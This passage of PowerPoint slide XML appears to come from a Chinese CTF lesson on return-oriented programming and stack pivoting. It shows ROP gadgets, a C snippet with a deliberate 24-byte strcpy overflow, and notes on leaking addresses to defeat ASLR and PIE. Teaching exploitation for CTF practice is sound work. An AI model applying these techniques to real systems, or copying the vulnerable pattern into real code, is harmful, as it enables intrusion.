            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1713" name="Shape 1713"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="18251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4" name="Shape 1714"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="30539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15" name="Shape 1715"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="34635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write</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1716" name="Shape 1716"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="38731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7" name="Shape 1717"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="42827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8" name="Shape 1718"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="46923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fd=0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1719" name="Shape 1719"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="51019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20" name="Shape 1720"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="55115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read</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1721" name="Shape 1721"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383600" y="25449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write(char *path, char *argv[], char *envp[]);</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1722" name="Shape 1722"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1710" idx="0"/>
            <a:endCxn id="1721" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3591400" y="3153567"/>
            <a:ext cx="0" cy="1340000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1723" name="Shape 1723"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7015451" y="2143100"/>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4" name="Shape 1724"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7015433" y="4129767"/>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5" name="Shape 1725"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10384400" y="3525767"/>
            <a:ext cx="1424000" cy="139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pop esi </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edi</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ebp</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Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1726" name="Shape 1726"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1714" idx="3"/>
            <a:endCxn id="1725" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9700100" y="3258767"/>
            <a:ext cx="684400" cy="965200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1727" name="Shape 1727"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1719" idx="3"/>
            <a:endCxn id="1725" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="9700100" y="4223967"/>
            <a:ext cx="684400" cy="1082800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832C4A67-68CA-4C55-919D-BA271017988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79275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4D1F7-4598-4FB7-8B43-6CCB192628D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2347174" y="2725805"/>
            <a:ext cx="749765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到目前为止我们只接触了内存空间分布已知的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但在绝大部分赛题中，由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保护的开启，在发送攻击载荷（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）之前，往往需要我们先泄露内存分布信息，接下来来看一道题目。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D411DE94-44FB-4AE6-AFAF-CD37A028E97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71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Shape 1732"/>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1733" name="Shape 1733"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="5100638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Definition</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>改变 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>溢出长度不足以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用直接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈溢出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>会出现空字符截断，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>地址含有空字符</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>在泄露地址信息后需要新的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP payload</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1734" name="Shape 1734"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6418200" y="4591900"/>
            <a:ext cx="5237600" cy="21140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sprintf(dst, "%s", user);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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x64 assembly:</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0x406113</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>:	55         push   %rbp</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0x406114</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>:	41 89 d4   mov    %edx,%r12d</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1735" name="Shape 1735"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814233" y="4661033"/>
            <a:ext cx="4647200" cy="190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if (strlen(user) &gt; 536)</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return;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609585"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 536-512=24 bytes overflow!</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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strcpy(dst, user);</a:t>
            </a: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8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4166A8-2019-448D-8F6E-ADD095C7D96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1" name="Shape 174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2" name="Shape 174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43" name="Shape 174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44" name="Shape 174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45" name="Shape 174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6" name="Shape 174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47" name="Shape 174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48" name="Shape 1748"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1742" idx="1"/>
            <a:endCxn id="174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49" name="Shape 174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50" name="Shape 1750"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1749" idx="1"/>
            <a:endCxn id="174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51" name="Shape 1751"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713773" y="45679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52" name="Shape 1752"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611040" y="47727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53" name="Shape 1753"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="5259700"/>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754" name="Shape 1754"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1753" idx="0"/>
            <a:endCxn id="174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55" name="Shape 1755"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1744" idx="0"/>
            <a:endCxn id="174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19" name="Shape 1732">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD42AE5-2170-433F-8ECE-6A883123F574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030877" y="870178"/>
            <a:ext cx="1419246" cy="58477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a:t>栈迁移</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9670FB9E-443C-4F18-AD8C-31724769155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1" name="Shape 176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0x6c bytes</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1762" name="Shape 176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63" name="Shape 176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64" name="Shape 1764"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="43078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add esp, 0x6C ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1765" name="Shape 176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66" name="Shape 176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67" name="Shape 176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68" name="Shape 1768"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1762" idx="1"/>
            <a:endCxn id="176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69" name="Shape 176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70" name="Shape 1770"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1769" idx="1"/>
            <a:endCxn id="176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71" name="Shape 1771"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713773" y="41615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72" name="Shape 1772"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611040" y="43663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73" name="Shape 177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74" name="Shape 1774"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1773" idx="0"/>
            <a:endCxn id="176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75" name="Shape 1775"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1764" idx="0"/>
            <a:endCxn id="176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E288A163-7310-4EB1-894C-69C1D1E87646}"/>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4BFA75C4-1DCB-4F34-B3C6-622B49CD05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1" name="Shape 178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2" name="Shape 178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83" name="Shape 178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84" name="Shape 178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85" name="Shape 178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6" name="Shape 1786"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2378167" y="24896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ROP payload</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1787" name="Shape 178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88" name="Shape 1788"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1782" idx="1"/>
            <a:endCxn id="178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89" name="Shape 178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90" name="Shape 1790"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1789" idx="1"/>
            <a:endCxn id="178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91" name="Shape 1791"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713773" y="275299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92" name="Shape 1792"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6611040" y="295779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93" name="Shape 179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94" name="Shape 1794"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1793" idx="0"/>
            <a:endCxn id="178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95" name="Shape 1795"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1784" idx="0"/>
            <a:endCxn id="178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83519AA1-D96A-479D-A389-EEF6280FBE1E}"/>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EB814168-B3DD-4122-BA33-9422BA60CA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Shape 180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01" name="Shape 180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02" name="Shape 1802"/>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03" name="Shape 180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sp>
        <p:nvSpPr>
          <p:cNvPr id="1804" name="Shape 1804"/>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05" name="Shape 1805"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1806" name="Shape 1806"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1801" idx="1"/>
            <a:endCxn id="180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07" name="Shape 1807"/>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08" name="Shape 1808"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1807" idx="1"/>
            <a:endCxn id="1804"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09" name="Shape 1809"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="51210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10" name="Shape 1810"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="53258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11" name="Shape 1811"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="58169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812" name="Shape 1812"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1811" idx="0"/>
            <a:endCxn id="180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13" name="Shape 1813"/>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14" name="Shape 1814"/>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15" name="Shape 1815"/>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16" name="Shape 1816"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1803" idx="0"/>
            <a:endCxn id="1814"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17" name="Shape 1817"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1815" idx="1"/>
            <a:endCxn id="1814"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18" name="Shape 1818"/>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9" name="Shape 1819"/>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20" name="Shape 1820"/>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21" name="Shape 1821"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1814" idx="0"/>
            <a:endCxn id="1804"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22" name="Shape 182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23" name="Shape 182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24" name="Shape 182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25" name="Shape 182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772EDA22-2AE2-4CC2-89DE-74CF518521E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31" name="Shape 183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32" name="Shape 1832"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394167" y="4751667"/>
            <a:ext cx="30004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pop ebp ; ret ;</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1833" name="Shape 1833"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1831" idx="1"/>
            <a:endCxn id="183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34" name="Shape 1834"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="361086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35" name="Shape 1835"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="381566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36" name="Shape 183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37" name="Shape 1837"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1836" idx="0"/>
            <a:endCxn id="183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38" name="Shape 183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39" name="Shape 183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40" name="Shape 184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41" name="Shape 1841"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1832" idx="0"/>
            <a:endCxn id="183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42" name="Shape 1842"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1840" idx="1"/>
            <a:endCxn id="183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43" name="Shape 184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4" name="Shape 184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45" name="Shape 184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46" name="Shape 1846"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1839" idx="0"/>
            <a:endCxn id="184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48" name="Shape 184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47" name="Shape 184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49" name="Shape 184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50" name="Shape 185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51" name="Shape 1851"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1850" idx="1"/>
            <a:endCxn id="184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52" name="Shape 185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53" name="Shape 185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54" name="Shape 185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55" name="Shape 185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24CF2195-48C4-47E2-A0C1-7D557935D0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Shape 18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61" name="Shape 186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62" name="Shape 1862"/>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63" name="Shape 1863"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1861" idx="1"/>
            <a:endCxn id="186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64" name="Shape 1864"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="256720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65" name="Shape 1865"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="277200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66" name="Shape 186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67" name="Shape 1867"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1866" idx="0"/>
            <a:endCxn id="186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68" name="Shape 186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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   esp, ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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69" name="Shape 186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70" name="Shape 187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71" name="Shape 1871"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1862" idx="0"/>
            <a:endCxn id="186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72" name="Shape 1872"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1870" idx="1"/>
            <a:endCxn id="186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73" name="Shape 187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4" name="Shape 187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75" name="Shape 187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76" name="Shape 1876"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1869" idx="0"/>
            <a:endCxn id="187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78" name="Shape 187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77" name="Shape 187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79" name="Shape 187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80" name="Shape 188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81" name="Shape 1881"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1880" idx="1"/>
            <a:endCxn id="187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82" name="Shape 188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83" name="Shape 188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84" name="Shape 188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85" name="Shape 188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886" name="Shape 1886"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5147067" y="275396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0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>esp = new stack addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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F894ACEE-A531-4FE3-8ECE-939B3C73902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Shape 189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92" name="Shape 1892"/>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93" name="Shape 189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94" name="Shape 1894"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1892" idx="1"/>
            <a:endCxn id="189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95" name="Shape 1895"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6729840" y="22762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96" name="Shape 1896"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7627107" y="24810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97" name="Shape 1897"/>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98" name="Shape 1898"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1897" idx="0"/>
            <a:endCxn id="189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99" name="Shape 1899"/>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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
